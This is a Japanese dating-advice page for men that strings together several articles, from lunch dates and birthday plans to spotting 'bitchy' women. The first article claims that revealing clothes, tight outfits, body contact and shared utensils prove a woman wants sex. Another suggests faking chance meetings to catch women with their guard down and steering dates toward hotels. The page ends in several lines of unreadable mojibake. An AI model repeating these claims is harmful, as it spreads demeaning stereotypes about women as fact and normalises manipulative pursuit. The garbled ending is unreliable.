デート攻略

デートをしているときにビッチか見分ける9つのコツ

デートをしている時でもどんな女性なのか気になるものです。

ビッチがどうかをその時に見分ける方法があれば、その後の展開も変わってくるので、デートに来た女性の様々な点からビッチがかどうかを判断するポイントをまとめています。

服装を見る

露出が多い服



デートの時点で、ビッチな女性かどうかを見分けるポイントとして、服装を見ることがポイントとなってきます。

ビッチな女性は、常に体を見て欲しく思っていますし、男性を誘うような服装をしていることが多いです。

ビッチな女性であれば、肌を見せることや見られることに警戒心がありませんし、むしろ見せることによって男性を惹き付けようとしています。

ですから、デートであっても露出が多い服装をしていることが多いものです。

気を引くような露出度が高い服装をしているほどにその女性はビッチであると言えます。

胸元が開いている

デートに着てきた服装で、胸元が開いているような服を着てくる女性はビッチである確率が高いと考えられます。

胸元を開けているということは、見られることが前提になっているので隠す気がありません。

ということは、見られる事が嬉しい女性や見られてもいいように自分のスタイルに自信のある女性が多いのです。

そういった女性は、当然、体を見せることに抵抗がないためにエッチな部分も多く持っており、ビッチである可能性が高いと考えられます。

また、胸元が開いている女性はそれだけ自分の胸に自信を持っているので、見られたい願望が強くありますからエッチなことにも積極的でビッチと言えるのです。

脚が出ている



ビッチな女性というのは、基本的に自分のスタイルや各パーツに自信を持っていることが多いものです。

例えば、胸が大きければ胸元を大きく開けていますし、足が綺麗だと分かっていればミニスカートを履いて足を出しています。

そこでミニスカートやホットパンツなどで足を出してデートに来る女性は、男性に見られたいという気持ちもありますし、それだけ自分を綺麗だと自覚していますので、そういった綺麗な女性は必然的にエッチにも積極的であり、ビッチである可能性が高いと言えるのです。

足を出してくるような女性、また網タイツを履いているような女性は、自分の足に自信を持っていますので、かなりの確率でビッチであると考えられます。

タイトな服装

ビッチな女性というのは、自分のスタイルに自信を持っているものですから、男性にしっかりと自分の体を見てほしいと意識することが多くなってきます。

そのような女性は、タイトな服装を好んで着ることも多いものです。

タイトな服装は、パーツだけに自信があってもなかなか着ることができません。

全身のスタイルに自信があるからこそ、タイトな服装をして周りからの目を引きたいと考えているのです。

こういった女性は男性にも積極的ですし、体を見せることに抵抗がないのでビッチであることが高いと言えます。

素振りを見る

体をつけてくる



ビッチな女性というのは、男性とボディコンタクトをしたいと考えていますから、積極的に体をつけてきます。

体を傍に寄せることで、男性の気がひけることを知っているからです。

そこで、ビッチな女性であれば、積極的に自分の体を寄せてきますので、すぐにわかります。

ビッチな女性は、体の関係を求めていますので、ボディコンタクトには抵抗がありませんから体を寄せ付けてくるのです。

ですから、積極的に体を相手につけることによって、より相手の気をひいていくようになります。

最初のデートでも積極的に体をつけてくるような女性は、ビッチである可能性が高いのです。

ボディタッチに積極的

ビッチな女性というのは、ボディタッチに積極的なことが多いです。

体に触れたり、触れられたりすることが大好きなのがビッチな女性の特徴ですから、自分がそういったことに興味を持っているということをアピールするためにも、ビッチな女性は積極的にボディタッチをしてきます。

また、男性に対してそういうアクションを取ることで、男性が喜ぶことを知っているのもビッチな女性の特徴です。

ビッチな女性は常に体を触りたがり、ボディコンタクトを求めているという面があります。

話すとき顔が近い

ビッチな女性というのは、キスをすることも抵抗を持っていませんので、話す時に顔が近いと言ったこともあげられます。

顔が近ければ当然ドキドキしますし、男性を落としやすいとわかっているからです。

ビッチな女性は、キスもしたいと常に思っておりますから、話をする時に顔が近く、誘惑するような仕草をします。

こういったポイントからも、ビッチな女性かどうかよくわかるのです。

ビッチな女性というのは、とにかく近くに寄ってきて話をしたりします。

自分が男性と触れ合うことが気持ち良く、そうしたいと考えているので、全体的な仕草が近くなってくるのです。

食事の時

間接キスを気にしない



ビッチな女性は、キスを気にしていませんので、間接キスなどもちろん気にすることもありません。

むしろ間接キスを見せつけることによって、男性の気を引こうとすることも多々あるのです。

飲みかけの飲み物を「欲しい」と言って預かり、飲んでから当たり前の様に返したり、食べかけのスプーンを借りて食事を食べて、何気なく返したりすることもありますし、口を開けて男性に「アーン」と言って食べさしてもらうような態度をとることもあります。

こういったことをさりげない形でできる女性は、ピッチである可能性が非常に高いですし、常に男性を誘惑するようなことが基本としてできていますので、自然な態度でこういう態度をとることはかなりのビッチであるのです。

食べ物を交換する

ビッチな女性かどうかを見分けるには、食べ物を積極的に交換するかどうかでもわかってきます。

ビッチな女性は、男性を虜にする術を知っていますので、男性が注文した料理を交換し、食べて返すことで、男性のことを気に入っているからこうゆうことができると見せつけるのです。

その際に自分が使った箸やフォークなどをそのまま返すことで、自分が使ったものを使わせ、間接キスを意識させることで男性を落とそうします。

ビッチな女性というのはこのように常に男性の心理を揺さぶってくるので、そういったことをしてくるかどうかで見分けることがでるのです。

まとめ

ビッチな女性というのは、常に男性の心理を揺さぶってきます。

それは、自分がビッチであるが故に、男性とエッチな関係を結びたいと思うからで、デートの時に男性を誘うような素振りを見せることは、男性とエッチな関係を築きたいと思っているからするものです。

しかし、普段からそういったビッチな女性であれば、隠そうとしてもデートの時にも見えてしまうものであります。

ビッチな女性は、見た目もエロく男性の目を引きやすいものです。

それだけにとどまらず、仕草やタッチの仕方など全てにおいて男性を魅了する術を知っていますので、そういったところから女性がビッチかどうかを見抜くことができます。

シーン別の女性と二人きりになるための7つの誘い方

二人きりになるにはどう誘ったら良いのだろうと多くの男性は思っていますよね。

断られてショックを受けるのは嫌だなと考えていては、絶好のチャンスを逃してしまいます。

そんな女性の誘い方をシーン(シチュエーション)別にご紹介したいと思います。

流行っている映画に行く



女性は流行っている物事に敏感な人が多く、流行っている物事は、相手が誘われやすい心境 にしてくれる事があるのです。

ですから、前もって相手女性とある程度の距離感になるように、何気ない話から始めるようにしてみましょう。

女性との日常会話を増やす事で、女性の好みの映画の事なども、話をかさねる事で分かってくるのではないでしょうか。

例えば「この映画好きって言ってたよね。今度行こうよ!」と聞くと、「自分の好みを覚えていてくれたんだ~!」と女性は嬉しくなり、自然とあなたからの誘いを受けてくれやすくなります。

女性は、男性に下心が少なからず在ることを知っているので、突然の誘いや二人きりになる事に不安を感じる人もいます。

がっついているのが分かる誘い方をすると、女性は身構えてしまったり、返事に困ったりしてしまう事があるので「デート」と意識し過ぎずに誘うと良いでしょう。

例えば「行かない?」と聞かずに、「行こうよ!」という感じで、軽いお出掛け感覚で誘った方が、女性はあまり困らないで返事が出来ると思います。

ほどよいムード漂う中で映画を観て、終わる頃には、女性も二人になりたいという気持ちに なっているので、個室タイプのお店やホテルに足が向くのではないでしょうか。

帰り道がたまたま一緒になる



仕事が終わって解放感がある時、ガードが弱くなるのは女性だけではありませんよね。

仕事の達成感もあり、テンションがあがっている帰り道というのは、何がなくても楽しいものです。

偶然帰り道が一緒になると尚更テンションが上がるので、さりげなく偶然を装ってみましょう。

例えば「お疲れ~!今帰り?一緒に帰ろうよ」など、相手に労いの言葉を言い軽く誘ってみ ましょう。

女性も「わ!偶然ってあるんだなぁ。同じ時間に終わったんだぁ」などと思い、一緒に話しながら帰るのも良いかなと案外気を許してくれることもあるでしょう。

女性によっては、「私が終わるの待ってたのかな?」と思う人もいるので、あくまでも自然でいることと、偶然というチャンスを密かに利用した言葉選びをする事がポイントですね!

男性はそんな「偶然のちから」を借りて、恋愛につながる第一歩を踏み出してみて下さい。

軽い会話をしながら一緒に帰り道を歩きます。

すると女性は、貴方のことを徐々に知っていく事が出来るので警戒感も薄くなります。

短い距離ならば、軽い話をして自分の印象や存在を知ってもらえ、相手に意識してもらえる きっかけになります。

逆に距離が長ければ長いほど、相手女性にこの後時間があるか、予定はないかという事を聞けて、「もし良かったら、これから飲みに行こうよ!良い店知ってるんだ」などと誘う事が出来ます。

女性も「もっと二人で話をしたい」などと思っているでしょうから、自然とそのまま二人きりの時間が楽しめると思います。

カラオケで距離を縮めたい



カラオケといえば、ストレス発散だったり盛り上がりたい時に行く事が多いですよね。

関係にもよりますが、二人でカラオケとなると、女性は戸惑ってしまうタイプが多いのではないかと考える男性もいるでしょう。

まさにそういった女性を誘いたくなってしまった場合があるとします。

そんな時は、前もって流行りの曲や相手女性の好きな曲を知る事から始めた方が良いでしょ う。

相手に自分を意識してもらうように、純粋に真面目に日頃から接する事が必要になります が、時間をかけた分だけ実る願いも多いですよ!

あなたが意識して「行かない?」というと女性にもその気持ちが伝わっているため、なかなか誘いに乗れないでいる女性もいますよね。

例えば、会話中にさりげないタイミングで「あの歌良いよね!」などと歌についての話題をふりましょう。

相手女性は「あ~あの歌ね。確かに!歌詞が良いよね~」と共感すると同時にカラオケに行きたいと思うようになっていきます。

最後まで楽しく歌って過ごすのも相手女性へ安心感を与えて、また一緒に行きたいなと思わせる事が出来るでしょう。

途中からムードある曲を歌いながら、さりげなく相手女性の座っている横に座って歌うのも良いのではないでしょうか。

いくつか歌ううちに楽しみながら話をしたり、上手くいけば軽いスキンシップまで行けるかも知れません。

遊園地の観覧車に乗る



観覧車に異性と二人でという恋愛映画や少女漫画にありがちなシチュエーションで、女性は 少なからず「いいなぁ、そういうシチュエーション!」と憧れています。

男性も「テーマパークデートも良いな」と考えたことがあるのではないでしょうか。

憧れていても実際は、「二人で観覧車って何だか乗りにくいな」と感じる女性もいるようです。

観覧車の中は二人きりだし、女性って観覧車内でのキスって憧れているよな」と突っ走り過ぎては行けません。

女性は以外と慎重なので、イチャイチャ目的だとすぐにバレてしまい、誘っても観覧車には なかなか乗ってくれないものです。

どんな場合でも当てはまる事ですが、相手としっかり話し合って決めるようにする事をオススメします。

例えば女性とのラインやメッセージを繰り返しする頻度を増やす事だけでも貴方に対する見 方や感じ方が変わって、誘いやすくなるものなのです。

事前のリサーチがないと高いところが苦手な女性や、誘いに臆病な女性にとってはせっかくの観覧車も台無しになります。

なので、高いところが大丈夫なのか(高所恐怖症かどうか)をたずねてあげることも二人きりになる大切な事です

遊園地なので、最初は他のアトラクションなどで楽しんで気分を高めておくと、より一層いいと思います。

観覧車内で二人きりになった時、ドキドキに変わりやすく、自然と距離が縮まります。

家に着くまでの車内

車内では、お互いに意識しています。

男性の運転している姿が格好いい、女性の髪から香ってくるシャンプーの匂いにドキっとするなど、多くの意見があります。

まだ恋人までの仲になれていない相手を、車内という密室へ誘うには前もって仲良くなる事 が必要ですが、打ち上げなどでの解散時に、「あ~!終電間に合わないかも」と焦っている 女性がいるとします。

見かけたら、さりげなく「僕でよければ、車で送るよ?」と声をかけてみるのも良いのではないでしょうか。

警戒はされるでしょうが、男らしくどっしり構えてみて下さい。

最初は「え~、でも…」と戸惑いますが困っている時に声をかけてくれた優しさに少しずつ応えていけるはずです。

焦らず相手の返事を待ってあげて下さい。

応えてくれたら、安心を与える帰り道にして、会話をしながら送るようにした方が次回デートに誘いやすいです。

密室にいるというドキドキ感から始まるので男性を意識して恋人になりたいと思ってしまうかも知れませんね。

夜の公園

女性は少なからず暗い公園に「何だか怖いイメージが強いな」と感じます。

心霊的なものや、不良のたまり場だったりしないかと不安もあります。

一方では、「夜の公園でキスとか憧れるよね」「公園のベンチでコーヒーを飲みながら語りたいよね」と想像する女性も沢山いると思います。

誘いたい公園の様子などはしっかりしらべておくとベストです。

女性はムードがある場所を好みますが、「これから何されるんだろう」と戸惑って身構えて しまいます。

例えば、飲み会の後などに、女性が「酔いさましに夜風にあたりたいかも」など思っている 時に「少し公園で休もうか」とさりげなく気遣うように誘ってみて下さい。

昼間と違い、周りが静かでライトの灯りも静かさを引き出させて見えますし、酔いが覚めても普段と変わらない男性の優しさを感じます。

それが、次回の誘いやすさにもつながっていくと思います。

海を見ながらまったりする



偉大な海を見つめながら会話をする事は、貴重な体験であり思い出に残ることでもあると思 います。

まだ恋人までいかない女性を誘う場合、いきなり「海に行こう」と言われても、女性は警戒してしまいますよね。

そんな時は、日頃から積極的に話しかけてみてはどうでしょうか?何気ない話題で構いませ ん。

距離を縮めてから、「今度の土曜日さドライブしない?一緒に行きたい場所があるんだ」などと、あえて行き先を言わないでみるのも良いでしょう。

どこに行くの?」と聞かれたら、「いつか大切な人と行きたい、って思ってた場所なん だ」など、相手が「特別」なんだと思える声かけをしましょう。

すると相手は、「大切に思ってくれているんだ」と意識し、少しずつ不安も消えていきデートに行きたいと応えやすくなると思います。

車内では気分が高まるようないつもと少し違った音楽をかけることで、目的の海までのドライブが楽しめると思います。

海に着いて二人きりになっても、リラックスした気持ちで会話が出来て、ゆっくりと距離を近づけていけるでしょう。

まとめ

いかがでしたか?女性は色々な場面に様々な思いを持っている事が多いものです。

ですので、ある程度仲良くなることや相手の事を良く知ってから誘う事で良い展開になった り、これから発展していく事が出来るようになると思います。

熱意を持って接する事で、女性は貴方の気持ちを受け止め安くなります。

参考にしてみて下さい!

【初デートは昼に行こう!】ランチデートがオススメな9つの理由

初デートはどうしようか考えるものです。

男性であれば、女性ともっと親密になりたいと考えたり、自分を良く見せたいと思ってお洒落な場所でディナーとイメージすることもあります。

しかし、女性からすれば夜のディナーデートは、その後どういった展開になるのか不安を感じることもありますので、ランチデートであれば、気楽に応じてくれるものです。

また、ディナーと違いランチは手軽にできるものですから、普段の仕事の合間でも行くことができるかもしれませんし、時間制限があることで、お互いをゆっくり知るチャンスにもなっていきます。

お休みの日であれば、ドライブを兼ねたりしてゆっくりと楽しむことができるのです。

警戒心がなくなる


女性の不安を取り除ける

ランチデートの魅力として、女性の心配や不安を取り除き、心の底から楽しんでもらうことができる点にあります。

デートに誘い、それに応じてくれるのですから、少なからず好意を抱いていると考えられますが、ディナーとなると、女性は食事の後のことも考えるようになるものです。

もしかしたら、ホテルに誘われるのかも、そういった気持ちがあればいいですが、初回のデートであれば、まだまだそのような考えはなく、様子を伺っている場合も多々考えられます。

そういったときはディナーではなく、ランチデートをすることで気持ちに余裕ができ、楽しむことができるのです。

時間をかけて話ができる

ランチデートをすることは、時間をかけて話をすることができるところがあります。

ディナーになるとどうしてもお酒が入ってくることも考えられるので、意識がハッキリしていないこともあるはずです。

そうなると、自分が何を言ったのか、そして、相手のことをしっかりと見極めることができないまま進んでいくのは望ましくないので、ランチディナーであれば、相手の本質を見ながらゆっくりと話を進めていくことができます。

安心感を与えることができる

デートに誘いたいくらい好きになる女性には、好感を持ってもらいたいものですが、ディナーデートだと、どこか躊躇されることがあります。

そういった不安なく、手軽にデートに応じてもらうためには、ランチデートで安心感を与えることが大切になってくるのです。

ランチデートであれば、デートの後も不安なく、買い物や映画に行くのが定番のコースですから、気にすることなく誘いに応じてくれる可能性があります。

女性にとって安心感があるということが、何よりも大切ですから、ランチデートは手軽に応じてもらうことができると言えるのです。

お手軽に楽しめる


食事にかける費用は少なくて済む

本命の彼女であればいいですが、ちょっと気になる女性でもデートに誘いたい気持ちが男性ならばあるはずです。

そういった時に、男性にとってもランチデートはメリットがあります。

それは、デートにかける費用が少なくて済むということです。

どんなお店でも、ディナーよりランチの方がお手軽な金額で楽しむことができます。

女性に気に入られるのであれば、ご飯代ぐらいは奢ってあげる方がポイントが高くなりますから、奢ってあげるべきですが、ディナーになるとそれなりの金額が必要です。

ランチであれば手軽に楽しむことができ、奢ってあげることもできますので、お試しで初めてのデートであればとても良いものといえます。

お互いの様子を見やすい

ランチデートの良さは、お互いの素の部分を見やすいということが言えます。

ディナーになるとお酒も入りますから、お互いに素の自分ではない場合もでてきますし、ほろ酔いでも気持ちが良くなるので、冷静になっていないこともあるのです。

しかし、ランチデートであれば、お酒を飲むことはほとんどありえませんので、相手の素を見ることができますし、どういった服装をしているのか、仕草や態度、話し方などを見極めることができます。

男性も女性の素を見極めることは重要で、お酒が入っていたからかわいく見えたなどと後から言うことはできませんので、ランチデートから始めてお互いの様子をしっかりと見極めることが大事なのです。

マメに会うことも可能

ランチデートであれば、職場の距離が近かったり、外回りでタイミングが合わせられるような関係であれば、平日の昼間でもデートをすることができます。

仕事の合間にマメに会うことができれば、嫌な仕事も前向きに乗り切れますし、日々頑張る力をもらうことができますので、お互いに仕事も私生活も充実したものを送って行くことができるのです。

ランチデートは少しの時間だからこそ、相手ともっと一緒にいたいという気持ちを持たせてくれるとも言えます。

相手を見極めやすい


相手の事がわかりやすい

ランチデートのメリットとして、相手のことを知りやすいということも一つのポイントと言えます。

デートをすると、ディナーでお酒を飲んだり、雰囲気が良く薄暗い照明のお店でゆっくりと食事をすることもありますが、そういった場所では相手の顔や仕草がよくわからなかったりするものです。

しかし、ランチデートであればシラフで会うことが多いですし、相手の顔や仕草もよく見ることができます。

そういった状況で相手を見ることで、冷静に相手のことを判断できますし、どういった人であるか知ることができるのです。

流されることが少ない

ランチデートをすることで、相手の本質が見えやすくなり、その場の雰囲気で流されてしまうようなことが少なくなります。

男性にとって女性とそういった関係になれることは望ましいことでもありますが、簡単な気持ちで関係をもってしまうと後々困ることにもなりかねません。

そうならないためには、相手をしっかりと見極めることが男性にとっても大切になりますから、お酒が入っていなかったり雰囲気に惑わされるようなことがありませんので、女性の本質を見ることができます。

日常を垣間見れる

ランチデートは普段の女性を垣間見ることができるのです。

ディナーデートでは、女性も服装に気を使ってくることもありますが、ランチデートであれば、普段のままの姿で会うことができます。

日常の雰囲気を感じることができれば、その女性の素を知ることもできますから、飾らない女性を知ることで自分に合った女性か、自分が好きなタイプの女性かをしっかりと見極めることができるのです。

女性の日常の様子を知ることでその女性の本質が見えてくるものであります。

まとめ

ランチデートであれば、女性の不安を取り除き、安心してできるデートといえます。

ですから、手軽にデートに誘っても、応じてくれることがありますので、使いやすい方法でもあるのです。

男性にとっても、女性の素の部分を見ることができますので、ディナーデートでのセクシーな雰囲気とは違い、通常の雰囲気を見ることで女性の本質を見抜くことができると言えます。

3回目のデートまでに彼女を作るためにすべき9つの行動

好きな女性とのデートは、楽しい時間ですよね。

それが恋人同士の関係になったら、もっと楽しいはず。

となると、相手の女性に告白です。

ですが、告白のタイミングって難しいですよね。

早過ぎると、女性の気持ちが付き合うまで満たしていない、遅すぎると友達どまりで終わってしまう。

そのため、いつしたらいいのか悩む男性も多いのではないでしょうか。

そこで今回は、3回目のデートまでに彼女を作るためにすべきことをご紹介します。

初デートは身だしなみに気を付ける

第一印象は、見た目で評価されることが多いです。

さらに、第一印象で相手に与えたイメージは、残りやすいとされています。

ですから、初デートでは特に「清潔感」を意識してください。

ボサボサの髪型や首元がよれた服など、清潔感にかける格好は絶対にNGです。

えー、並んで歩きたくないな。」「〇〇君とは付き合えないな。」などと思われてしまいますよ。

このようなイメージを与えてしまうのは、第一印象として最悪なケースです。

相手の女性の好きな服装などを、リサーチできるのであればしておきましょう。

また、自分の私服に自信がなければ、友達にコーディネートを一緒に考えてもらうのもいいと思います。

相手に楽しかったと思わせる

初デートで、いきなり恋愛対象として見てもらおうと頑張る必要はありません。

それよりもまずは、相手の女性が「今日は楽しかったし、また遊んでもいいな。」と思ってもらえるようにしましょう。

最終的に、気の合う男友達という印象を与えられれば、初デートは成功ではないでしょうか。

積極的に話しかける

特に1回目のデートは、お互い緊張しているのもあり、少しの沈黙でも気まずく感じてしまいがちです。

相手の女性に、「沈黙になっちゃった。どうしよう。」と思わせないためにも、あなたから積極的に話しかけるようにしましょう。

まずは、あなたのことを相手の女性に教えてあげると良いでしょう。

あなたがどんな人なのかを知ることで、女性の警戒心を少しほぐす効果があります。

ただ、自分のことを話したあとは、彼女のことについて聞くのを忘れないでください。

会話はなるべく、相手の女性の話を聞く側に徹しましょう。

人は、自分がたくさん話をしたり、話を聞いてもらえたときに楽しかったと感じるんだとか。

つまり、あなたが相手の女性の会話を引き出してあげると、楽しかったと感じさせることに繋がるのです。

ですから、初めはいろんな話題を話して、そのなかで女性の食いつきがよかった話題を深掘りすると良いでしょう。

共感できるところはしっかりリアクションをする

会話のなかで、共感できるところは「俺も!
えー、一緒じゃん!」などとしっかりリアクションをとるようにしましょう。

すると相手の女性の会話のテンションもあがり、様々なことをあなたに話すようになります。

それが「〇〇君といると、楽しい。」「この人になら、なんでも話せるような気がする。」などと、心を開かせるきっかけにも繋がるのではないでしょうか。

会話は先のことを話す

会話の中に、少し先の話を織り交ぜるようにしましょう。

例えば「ここ、また今度一緒に来たいな。」「寒い時期にまた来よう。」「お花見シーズンに来てもいいよね。」などと、少し先のことを意識させるようにしてみてください。

少し先も一緒に過ごすのを連想させて、付き合いたいという意思があることをアピールしましょう。

さらに、またデートしたいというアピールにもなります。

次のデートの約束をしてから別れる

次のデートの約束は、別れたあとにメールやラインでする男性が多い傾向にあります。

ですが、その際のメールのやりとりなどで、相手に気を遣わせてしまう場合があるので、次の約束は、デートの最中にしておきましょう。

デートの約束は、相手の女性との会話が盛り上がっているときにすると、成功しやすいそうです。

どこかでイベントがある、お出かけスポットなどの内容で会話が盛り上がっていたら、次のデートに誘う絶好のチャンスですよ。

デートに誘ったときの、相手の反応もチェックしておきましょう。

いいよ!」「いいね!行きたい行きたい!」など乗り気な反応がもらえれば、あなたに好感を持っている証拠です。

上のようなチャンスがなくても、デートに誘う場所は、相手の女性との会話のなかにヒントが隠されています。

彼女の好きなもの、食べたいもの、行きたい場所、苦手なものを言っていたら、しっかり覚えておきましょう。

ギャップをみせる

1回目のデートでは緊張などもあり、肩に力が入りがちです。

2回目となると、少しリラックスして相手の女性に接することができるのではないでしょうか。

そこで、前回のデートでは見せなかった一面を見せてみましょう。

例えば、歌に自信がある人は、カラオケに行ってみる。

普段あまり笑わない人であれば、無邪気な笑顔をみせる。

おちゃらけキャラのイメージを持たれている人であれば、デートではしっかり相手の女性をリードする。

女性はギャップに弱い傾向があるので、意外な一面を見せると、一気に恋愛対象になることもあるんです。

レディーファーストを心がける

どんな女性でも、か弱い女性のように扱ってもらえると嬉しいものです。

相手の女性の荷物を持つ、エスカレーターに乗るときは彼女を先に乗せて、あなたが後ろに立つようにする、人混みが多いところでは手を握ってリードするなど、レディーファーストを心がけるようにしましょう。

すると「〇〇君って素敵だな。」「これって、特別扱いされてるってことかな?」などと好感を持たせたり、相手を意識させることができます。

告白は直球勝負

1回目、2回目とデートを重ね、あなたと相手の女性との距離は初めと比べると、かなり縮まったと思います。

3回目のデートの誘いに応じてくれるということは、相手の女性もあなたに好意を持っている可能性が高いです。

ある調査では、3回目のデートに行く女性の半数は、脈ありというデータがあります。

ですから、3回目のデートでの告白で成功する可能性は大いにあるのです。

告白は凝った方法ではなく、好きだという気持ちが、いかに相手に伝わるかが重要です。

〇〇ちゃんのことが好きなんだ。俺と付き合ってください。」など、シンプルな言葉で告白してみてください。

まとめ

3回目のデートで告白をするのが、ベストなタイミングとされています。

ですが、ただ3回デートをするだけでは意味がありません。

1回目と2回目のデートで、いかに相手の女性との距離を縮められるかが重要です。

ぜひ今回ご紹介した、行動を参考にしてみてください。

彼女との誕生日デートを成功させるための10のデートプラン

女性とデートをする時、何をしていいかわからない、どこへ行ったらいいかわからないなんてことはよくありますよね。

初デートであれば選択肢は多くありますが、マンネリカップルだといつも同じプランになりがちということもあります。

彼女に喜んでもらうために以下のデートプランはいかがでしょうか?

定番編

ショッピングデート

女性と言えばショッピング。だからと言ってショッピングに行くだけでは彼女も満足しません。

行きたいお店はきっと彼女が勝手に向かってくれると思いますが、その先でよくある「どっちが私に似合う?」攻撃が必ず待っています。

それがなくても決められる女性もいますが、たいていは質問をするタイプが多くいると思われます。

この場合、「どちらでもいいよ」という答えはNGです。必ずどちらかを選んであげるのがポイントです。

ですが時には自分が選んだ方ではない方を選ばれてしまいますが、そこは特に気にしなければいいでしょう。

ドライブデート

彼女もお仕事をしていれば、気分転換をしたいと思うでしょう。

運転できない彼女なら特にドライブデートには乗り気になります。

目的地を決めて走るのも良いですが、特に目的地もなく適当に高速に乗って、大きめのサービスエリアで買い物をする、というのでも問題はないでしょう。

ここでただドライブデートをしただけでは、普通のデートになってしまいます。

彼女の誕生日なので、プレゼントを用意しておくのがベストです。

数万円のアクセサリー、大きなぬいぐるみ、プリザーブドフラワーなど定番ではありますが、こういった定番のものが失敗しなくて安心です。

レジャーデート

遊園地や夢の国、ファミリー牧場など普段気軽に行けない場所へ行って、いつもと違うデートを楽しむのもいいかもしれません。

遊園地や夢の国は夜景が綺麗なので、そのタイミングでプレゼントを渡してあげるのも良いでしょう。

四季によって様々なレジャー施設がありますから、誕生日の季節によって行く場所を決めてみることも一つの方法です。

まったりお家デート

同棲カップルや、自分の家に彼女を呼ぶ場合、誕生日ぐらいは彼女もゆっくりしたいはずなので、家の事は全て男性がやってあげましょう。
ご飯系は出前やどこか食べに行くのでもOK。

もちろんプレゼントは準備しておいて、お好きなタイミングで渡すのが良いと思います。

自分の家なので、部屋に少しパーティ風の装飾をつけておいても、彼女は喜ぶでしょう。

彼女の家に行くときは、プレゼントを準備するぐらいしか出来ませんが、飲み物やお菓子を買って行ったり、事前に彼女に観たいDVDのどを聞いて借りてくるぐらいの事はしてみてもいいかもしれません。

ドッキリお家デート

最近流行っているのが、風船を部屋中に敷き詰め、宝探し風に誕生日プレゼントを見つけてもらう方法です。

結構大変な作業ですが、プレゼントを見つけた時の彼女の表情を思い浮かべれば、お安い御用かもしれませんね。

風船が大変な場合は、普通の宝探し風にしてみても面白いかもしれません。

部屋中を彼女の好きなキャラクターのぬいぐるみでいっぱいにするものオススメです。

贅沢編

ちょっとお高めのレストランデート

最近ではグルメ情報サイト等で誕生日のプランが当たり前のようにあります。
このプランには特典がついているところもあり、非常にオススメです。

お店は高級すぎるところよりも、普段より少しリッチなレストランが良いでしょう。

なぜならドレスコードがなく、普段着で入れますし、周りに同じような感じのお客さんが多いので、気を張らずにいられます。

このデートプランを誕生日プレゼントにしても良いですが、他にちょっとした花束や、アロマキャンドル等をプレゼントに用意しておくと、さらに喜んでくれるでしょう。

シティホテルでお泊りデート

レストラン同様、誕生日のプランがあるところが多くあります。

こちらも特典がついているものがありますので、オススメです。

シティホテルは少し高いイメージがあると思いますが、予約の時期や平日を狙っていけば、リーズナブルに宿泊できます。

シティホテルの誕生日プランの特典は、大体がケーキやアメニティのプレゼントです。

部屋も景色のいい部屋や、大きめの部屋など、少しリッチな条件のお部屋を用意してくれることがあります

シティホテルに宿泊する前もしくは宿泊した後に、近くの観光スポットへ出かけてみるのも良いでしょう。

エステに連れて行く

エステは少々お高いので、フラッと立ち寄れるようなものではありません。

ですが、エステで綺麗にしてもらいたい女子は沢山います。

アクセサリーや花束をプレゼントするのと同様の価値がエステにはあります。

この日予約しておいたから。誕生日プレゼントだよ」と事前に連絡をしておき、エステ終わりの彼女を迎えに行って、その後ディナーやショッピングなどのデートに展開をするのがベストです。

ネイルサロンやつけまつげのサロンでも問題ないでしょう

会えない時(番外編)

テレビ電話をする

仕事が立て込んでしまって、どうしても誕生日の当日、あるいはその近辺ですら会えない場合は、誕生日の当日にテレビ電話をしてあげましょう。

きっと忙しいことを理解した上で彼女は我慢していると思うので、テレビ電話でありったけの愛情トークをしてあげることをオススメします。

後日会える時にどんなデートをするか、話し合っておくのも一つの方法です

宅配でプレゼントを贈る

事前に彼女の欲しいもの、もしくは彼女が喜ぶであろうものを選んでおき、誕生日当日にプレゼントが届くように指定して送ってあげましょう。
その後は電話をして、誕生日を祝ってあげるのも大切です。

この時、なるべく次のデートの約束をしてあげられると彼女も安心します

まとめ

人それぞれですが、大抵の女性は誕生日に何かしらのアクションをしてもらうと嬉しいようです。

ひと手間だけでも十分喜んでくれますが、もうひと手間加えるだけで更に特別感が増して、忘れられない誕生日になるようです。

誕生日なのでプレゼントは彼女の欲しいものを贈ってあげるのがベストですが、特にないようであれば、こちらで選んでしまって大丈夫でしょう。

a�?a?�a??a??c??a�si??a��a???��i??i?�a??e?�a??a?�a?�a??a?�7a?�a?�a?�a??a??a?�e??a?�?�?

a?�a?�a?�a?�a?�a???��a��a?�a??a??a?�e??a?�a?�i?Y

a?�a?�e??a??a?Ya��OKa?�a?�a��a��a??a��a?�a?�i?Y

c��?��a??a��e?�a?�a��a?�a?�a???��a��a?�a?�a??a??a?�a��a?�a?�a��a?�a��

a??a?�a?�a�Sa�za??a???��a???�?a�?a?sOKa??e?�a??a?�a?�a??a?�a?�a??a??a?�e??a?�?�?a��7a?�a?�c??a��a?�a??a?�a��

e��?��a??a?�a?�e?Ya?�a?si??

2a??a??a�Sa?�a??a??a�?a??a?�a��a??a�?a��a??a??a��i??i?�a��a��a��a??a��a??e???��a??e�?a?�a??e?�a??a��a?�a??a??a?�e??a?�?�?a?�a?�a��

e��?��a??a?�a?�a�?a?�a???��a��a��a??a?�a?�a?�a�?a��e�sa?�cY?a??a?????a?�a??a�?a��a??a��e��e??a?�a��a��a?�a??a��a??a?�a???�?a??a��a?Ya�?a�?e�?a?�c??cZ�a?�i??i?�a��a��a��a??a??a?�a��

e��?��a??a?�a?�e?Ya?�a?sa��a?�a?�a?�e�?a?�a�?a?Sa?�a?�a?�a?�a??a??a�?a?�a??a?�a??a?Y?��esZa?�a�?a�Sa?�a??2a??a??a�Sa?�a?�a?�e??a?�a��e??a?�a?�a�?a??e??a??a?�i??i?�a��a��a��a??a��a??e???��a��e�?a??a�Sa??a?�a��

a?Ya?�a??a�Sa??a?�a?�?�?a�?a��a�?a?�a?�a�?e��?��a??a?�a?�e?Ya?�a?sa????�aS?a?�a?�a��

?�?e??a�Sa?�e??e?Ya?�a?�e??a?�

a�S?�?e??a�Sa?�e??e?Ya?�a�?c�?a?�a�?a��a??a?�e�?a?�a?�a?�a??a???��a?�a??a??a?�e??a??a?Ya?�a�??��a?�a??a??a?�a��

a??a��a??a��a???��a??e??a??a?Ya?�a�??��a??e??a??a?�a??a��a�????a??a?�a?�e??a??a?�a�?i??i?�a��a��a��a??a��a??e???��a??a??a??a??e�?a??a�Sa??a?�a��

